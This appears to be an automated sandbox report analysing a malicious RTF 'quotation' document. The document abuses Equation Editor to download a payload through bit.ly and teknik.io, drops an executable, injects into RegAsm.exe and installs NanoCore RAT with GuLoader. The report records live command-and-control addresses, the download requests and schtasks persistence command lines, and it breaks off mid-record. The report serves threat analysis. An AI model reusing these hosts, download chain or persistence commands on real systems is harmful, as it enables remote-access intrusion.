                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                Malicious:false
                                                                                Preview: ..
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\LIP8714C.txt
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                File Type:ASCII text
                                                                                Category:downloaded
                                                                                Size (bytes):64
                                                                                Entropy (8bit):4.030028124459133
                                                                                Encrypted:false
                                                                                SSDEEP:3:vpqMLJUQ2ciiZ/YXvWVt2X:vEMWXcijWVM
                                                                                MD5:25EDED50548FE4FFF3119179E391DD16
                                                                                SHA1:73D001FDD077A3066DB93CC0EF438BC51D2C20F0
                                                                                SHA-256:2CDCAB99426A62F6722A1704DE32D7B9BB8925A45B767D0934A1365A1578B1F1
                                                                                SHA-512:D85614C03EC7E9636E32AC05386752A76B2B330742DB6F6BC3A68EB566B94CE77ABA70E6A737E0EFAAADCE832289C4D623488DCA099765AF710ADA0077935300
                                                                                Malicious:false
                                                                                IE Cache URL:live.com/
                                                                                Preview: wla42..live.com/.1536.4124483072.30871743.3006855612.30870411.*.
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Y5D8BEZV.txt
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:ASCII text
                                                                                Category:downloaded
                                                                                Size (bytes):89
                                                                                Entropy (8bit):4.3519817792342295
                                                                                Encrypted:false
                                                                                SSDEEP:3:jviOdjc3SQBI6LJci2JQdYVO2O2LGWTW3SVy2X:uOdg3SQI69ci2J53OyTXf
                                                                                MD5:BE6FA4005BF612690EEE1ECDD31EE976
                                                                                SHA1:883ACE9B58936BEE7163C278302FDD324127848A
                                                                                SHA-256:A05E2DC449119D274ED9B43B253ACD75E696BCE9AD895B8D8393B538560A28B1
                                                                                SHA-512:DC1C24E681E21D645F5CD3BE083F27DC4E4C9CC275BBD51A3D8B6205FC46EBD63DF0DC7857A16665BD82CFBF234DFBC56B48CCC57ABA89A59E7367D6F078584C
                                                                                Malicious:false
                                                                                IE Cache URL:bit.ly/
                                                                                Preview: _bit.l1p6te-b37a8979adaf075f5e-00T.bit.ly/.1536.1532647680.30906545.667713608.30870411.*.
                                                                                C:\Users\user\Desktop\~$OTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):162
                                                                                Entropy (8bit):2.431160061181642
                                                                                Encrypted:false
                                                                                SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                                                                MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                                                                SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                                                                SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                                                                SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                                                                Malicious:false
                                                                                Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                                                                C:\Users\user\subfolder1\filename1.exe
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):131072
                                                                                Entropy (8bit):4.856871861209239
                                                                                Encrypted:false
                                                                                SSDEEP:3072:6wVUP1A3a64iOR/VfgmLQPDBZByQqFXrMQqwV:6wVUPH6GfgmLQPDBZByQqFXIQqwV
                                                                                MD5:A6AD1C3046A3CF0C6992507F2886AAB3
                                                                                SHA1:8024E4315C4BD196F1531E08C541359DBAC70A39
                                                                                SHA-256:CEF944407A26C3C148AFBF8253BAA55AEE7CDFAEC17B5A158831574245BAC8AD
                                                                                SHA-512:A5C0796BCCE3CEDE14CC02915A4A0A55AEEAFD0B0675AF8FE395905F9ED78A58CBDCED5EE89CFBDD7E55B90A5AED2D647C76EE3BB9DD35E778DA19680768F21A
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 28%
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L.....Y.................P...................`....@.........................................................................tY..(....p.....................................................................(... ....................................text....M.......P.................. ..`.data........`.......`..............@....rsrc.......p.......p..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\Public\69577.exe
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:modified
                                                                                Size (bytes):131072
                                                                                Entropy (8bit):4.856871861209239
                                                                                Encrypted:false
                                                                                SSDEEP:3072:6wVUP1A3a64iOR/VfgmLQPDBZByQqFXrMQqwV:6wVUPH6GfgmLQPDBZByQqFXIQqwV
                                                                                MD5:A6AD1C3046A3CF0C6992507F2886AAB3
                                                                                SHA1:8024E4315C4BD196F1531E08C541359DBAC70A39
                                                                                SHA-256:CEF944407A26C3C148AFBF8253BAA55AEE7CDFAEC17B5A158831574245BAC8AD
                                                                                SHA-512:A5C0796BCCE3CEDE14CC02915A4A0A55AEEAFD0B0675AF8FE395905F9ED78A58CBDCED5EE89CFBDD7E55B90A5AED2D647C76EE3BB9DD35E778DA19680768F21A
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 28%
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L.....Y.................P...................`....@.........................................................................tY..(....p.....................................................................(... ....................................text....M.......P.................. ..`.data........`.......`..............@....rsrc.......p.......p..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                Static File Info

                                                                                General

                                                                                File type:Rich Text Format data, unknown version
                                                                                Entropy (8bit):6.068615237294724
                                                                                TrID:
                                                                                • Rich Text Format (5005/1) 55.56%
                                                                                • Rich Text Format (4004/1) 44.44%
                                                                                File name:QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc
                                                                                File size:967360
                                                                                MD5:bc1c94e783483f1c218efb5dcaf5f67e
                                                                                SHA1:7747c98d3d2da16f6e8b2fc56bd0e84532e3a543
                                                                                SHA256:d1e84cab5bf5eadd159b04374dce5a78a0e93156086475d41ad86665357dfc66
                                                                                SHA512:e399eeecd3067441e52ddcbb394a8547e1ed20fb262a8c70ffc37ac49b6854410011e23d1405c94d6aded1ca32627b8a1f27bf35c7d2d1767dfffbbf3f3a7f17
                                                                                SSDEEP:24576:X6767676767676767676767676767676767676767676767676q5j:quuuuuuuuuuuuuuuuuuuuuuuus
                                                                                File Content Preview:{\rtf33843\page51787859448176035@m42JEUa4SrclZjjE@-KI2WTYrCCIYwauZ0C<eh&&7_M-C_D--_-V,64>88964$Cv>yt=n6|:%_>jn8%bm\mklP;=u\k6588.14.... .... ...... .... .... ....

                                                                                File Icon

                                                                                Icon Hash:e4eea2aaa4b4b4a4

                                                                                Static RTF Info

                                                                                Objects

                                                                                Id:0
                                                                                Start:000D9BB0h
                                                                                Format ID:
                                                                                Format:
                                                                                Classname:
                                                                                Datasize:
                                                                                Filename:
                                                                                Sourcepath:
                                                                                Temppath:
                                                                                Exploit:no

                                                                                Network Behavior

                                                                                Snort IDS Alerts

                                                                                Timestamp                 Protocol  SID      Message                             Source Port  Dest Port  Source IP     Dest IP
                                                                                02/25/21-07:31:12.865275  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49171        4488       192.168.2.22  194.5.98.202
                                                                                02/25/21-07:31:18.959312  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49172        4488       192.168.2.22  194.5.98.202
                                                                                02/25/21-07:31:26.516121  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49173        4488       192.168.2.22  194.5.98.202
                                                                                02/25/21-07:31:32.853198  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49174        4488       192.168.2.22  194.5.98.202
                                                                                02/25/21-07:31:39.738064  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49175        4488       192.168.2.22  194.5.98.202

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                Timestamp                            Source Port  Dest Port  Source IP      Dest IP
                                                                                Feb 25, 2021 07:29:14.575544119 CET  49165        80         192.168.2.22   67.199.248.10
                                                                                Feb 25, 2021 07:29:14.626983881 CET  80           49165      67.199.248.10  192.168.2.22
                                                                                Feb 25, 2021 07:29:14.627127886 CET  49165        80         192.168.2.22   67.199.248.10
                                                                                Feb 25, 2021 07:29:14.627883911 CET  49165        80         192.168.2.22   67.199.248.10
                                                                                Feb 25, 2021 07:29:14.679239988 CET  80           49165      67.199.248.10  192.168.2.22
                                                                                Feb 25, 2021 07:29:14.770637989 CET  80           49165      67.199.248.10  192.168.2.22
                                                                                Feb 25, 2021 07:29:14.770742893 CET  49165        80         192.168.2.22   67.199.248.10
                                                                                Feb 25, 2021 07:29:14.934967041 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:14.986754894 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:14.987035036 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:15.002682924 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:15.057116032 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:15.057153940 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:15.057266951 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:15.057316065 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:15.069318056 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:15.124504089 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:15.124650002 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:16.673723936 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:16.754147053 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:16.999515057 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:16.999567032 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:16.999798059 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:16.999907970 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:16.999948025 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:16.999984980 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:16.999989986 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:17.000025034 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:17.000046015 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:17.000701904 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:17.000741959 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:17.000777006 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:17.000799894 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:17.000830889 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:17.001118898 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:17.001157999 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:17.001193047 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:17.001195908 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:17.001216888 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:17.001255989 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:17.001569986 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:17.001612902 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:17.001647949 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:17.001668930 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:17.008138895 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:17.051927090 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:17.051981926 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052119017 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052165985 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:17.052170992 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052200079 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:17.052217007 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052244902 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:17.052256107 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052284956 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:17.052297115 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052316904 CET  49166        443        192.168.2.22   5.79.72.163
                                                                                Feb 25, 2021 07:29:17.052345037 CET  443          49166      5.79.72.163    192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052361012 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052386045 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052406073 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052426100 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052454948 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052464962 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052479029 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052512884 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052530050 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052557945 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052572966 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052617073 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052823067 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052864075 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052885056 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052902937 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052908897 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052941084 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052961111 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052979946 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052989960 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.053019047 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.053040981 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.053081036 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.053147078 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.053188086 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.053210974 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.053231955 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.053481102 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.053522110 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.053548098 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.053575039 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.055668116 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.104232073 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.104295969 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.104334116 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.104377031 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.104413986 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.104461908 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.104470968 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.104502916 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.104506016 CET443491665.79.72.163192.168.2.22

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 25, 2021 07:29:14.461078882 CET | 192.168.2.22 | 8.8.8.8 | 0x7e45 | Standard query (0) | bit.ly | A (IP address) | IN (0x0001)
Feb 25, 2021 07:29:14.511475086 CET | 192.168.2.22 | 8.8.8.8 | 0x7e45 | Standard query (0) | bit.ly | A (IP address) | IN (0x0001)
Feb 25, 2021 07:29:14.812344074 CET | 192.168.2.22 | 8.8.8.8 | 0xef41 | Standard query (0) | u.teknik.io | A (IP address) | IN (0x0001)
Feb 25, 2021 07:29:14.872773886 CET | 192.168.2.22 | 8.8.8.8 | 0xef41 | Standard query (0) | u.teknik.io | A (IP address) | IN (0x0001)
Feb 25, 2021 07:31:07.850161076 CET | 192.168.2.22 | 8.8.8.8 | 0xbe16 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
Feb 25, 2021 07:31:08.949430943 CET | 192.168.2.22 | 8.8.8.8 | 0xbf16 | Standard query (0) | ibkebw.dm.files.1drv.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 25, 2021 07:29:14.511269093 CET | 8.8.8.8 | 192.168.2.22 | 0x7e45 | No error (0) | bit.ly | - | 67.199.248.11 | A (IP address) | IN (0x0001)
Feb 25, 2021 07:29:14.511269093 CET | 8.8.8.8 | 192.168.2.22 | 0x7e45 | No error (0) | bit.ly | - | 67.199.248.10 | A (IP address) | IN (0x0001)
Feb 25, 2021 07:29:14.561319113 CET | 8.8.8.8 | 192.168.2.22 | 0x7e45 | No error (0) | bit.ly | - | 67.199.248.10 | A (IP address) | IN (0x0001)
Feb 25, 2021 07:29:14.561319113 CET | 8.8.8.8 | 192.168.2.22 | 0x7e45 | No error (0) | bit.ly | - | 67.199.248.11 | A (IP address) | IN (0x0001)
Feb 25, 2021 07:29:14.872477055 CET | 8.8.8.8 | 192.168.2.22 | 0xef41 | No error (0) | u.teknik.io | teknik.io | - | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 07:29:14.872477055 CET | 8.8.8.8 | 192.168.2.22 | 0xef41 | No error (0) | teknik.io | - | 5.79.72.163 | A (IP address) | IN (0x0001)
Feb 25, 2021 07:29:14.932527065 CET | 8.8.8.8 | 192.168.2.22 | 0xef41 | No error (0) | u.teknik.io | teknik.io | - | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 07:29:14.932527065 CET | 8.8.8.8 | 192.168.2.22 | 0xef41 | No error (0) | teknik.io | - | 5.79.72.163 | A (IP address) | IN (0x0001)
Feb 25, 2021 07:31:07.904503107 CET | 8.8.8.8 | 192.168.2.22 | 0xbe16 | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | - | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 07:31:09.023087978 CET | 8.8.8.8 | 192.168.2.22 | 0xbf16 | No error (0) | ibkebw.dm.files.1drv.com | dm-files.fe.1drv.com | - | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 07:31:09.023087978 CET | 8.8.8.8 | 192.168.2.22 | 0xbf16 | No error (0) | dm-files.fe.1drv.com | odc-dm-files-geo.onedrive.akadns.net | - | CNAME (Canonical name) | IN (0x0001)

                                                                                HTTP Request Dependency Graph

                                                                                • bit.ly

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 67.199.248.10 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Feb 25, 2021 07:29:14.627883911 CET | 0 | OUT | GET /2ZKf4aq HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: bit.ly
Connection: Keep-Alive
Feb 25, 2021 07:29:14.770637989 CET | 1 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Thu, 25 Feb 2021 06:29:14 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 116
Cache-Control: private, max-age=90
Location: https://u.teknik.io/wREzo.txt
Set-Cookie: _bit=l1p6te-b37a8979adaf075f5e-00T; Domain=bit.ly; Expires=Tue, 24 Aug 2021 06:29:14 GMT
Via: 1.1 google
Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 2e 74 65 6b 6e 69 6b 2e 69 6f 2f 77 52 45 7a 6f 2e 74 78 74 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://u.teknik.io/wREzo.txt">moved here</a></body></html>


                                                                                Code Manipulations

                                                                                Statistics

                                                                                Behavior

                                                                                System Behavior

General

Start time: 07:28:30
Start date: 25/02/2021
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase: 0x13f320000
File size: 1424032 bytes
MD5 hash: 95C38D04597050285A18F66039EDB456
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 07:28:32
Start date: 25/02/2021
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 07:28:35
Start date: 25/02/2021
Path: C:\Users\Public\69577.exe
Wow64 process (32bit): true
Commandline: C:\Users\Public\69577.exe
Imagebase: 0x400000
File size: 131072 bytes
MD5 hash: A6AD1C3046A3CF0C6992507F2886AAB3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Visual Basic
Antivirus matches:
• Detection: 28%, ReversingLabs
Reputation: low

General

Start time: 07:30:17
Start date: 25/02/2021
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit): false
Commandline: C:\Users\Public\69577.exe
Imagebase: 0xbf0000
File size: 53248 bytes
MD5 hash: 246BB0F8D68A463FD17C235DEB5491C0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 07:30:22
Start date: 25/02/2021
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit): true
Commandline: C:\Users\Public\69577.exe
Imagebase: 0xbf0000
File size: 53248 bytes
MD5 hash: 246BB0F8D68A463FD17C235DEB5491C0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.2382867266.000000001F3FF000.00000004.00000001.sdmp, Author: Joe Security
Reputation: moderate

General

Start time: 07:30:28
Start date: 25/02/2021
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp'
Imagebase: 0x2c0000
File size: 179712 bytes
MD5 hash: 2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 07:30:29
Start date: 25/02/2021
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp80F5.tmp'
Imagebase: 0x2c0000
File size: 179712 bytes
MD5 hash: 2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 07:30:29
Start date: 25/02/2021
Path: C:\Windows\System32\taskeng.exe
Wow64 process (32bit): false
Commandline: taskeng.exe {DA6299CA-95CA-4E9D-8945-2CC05321254C} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Imagebase: 0xff9c0000
File size: 464384 bytes
MD5 hash: 65EA57712340C09B1B0C427B4848AE05
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

                                                                                General

                                                                                Start time:07:30:30
                                                                                Start date:25/02/2021
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0
                                                                                Imagebase:0xbf0000
                                                                                File size:53248 bytes
                                                                                MD5 hash:246BB0F8D68A463FD17C235DEB5491C0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Reputation:moderate

                                                                                General

                                                                                Start time:07:30:31
                                                                                Start date:25/02/2021
                                                                                Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
                                                                                Imagebase:0xd90000
                                                                                File size:53248 bytes
                                                                                MD5 hash:246BB0F8D68A463FD17C235DEB5491C0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Antivirus matches:
                                                                                • Detection: 0%, Virustotal, Browse
                                                                                • Detection: 0%, Metadefender, Browse
                                                                                • Detection: 0%, ReversingLabs
                                                                                Reputation:moderate

                                                                                General

                                                                                Start time:07:30:36
                                                                                Start date:25/02/2021
                                                                                Path:C:\Users\user\subfolder1\filename1.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Users\user\subfolder1\filename1.exe'
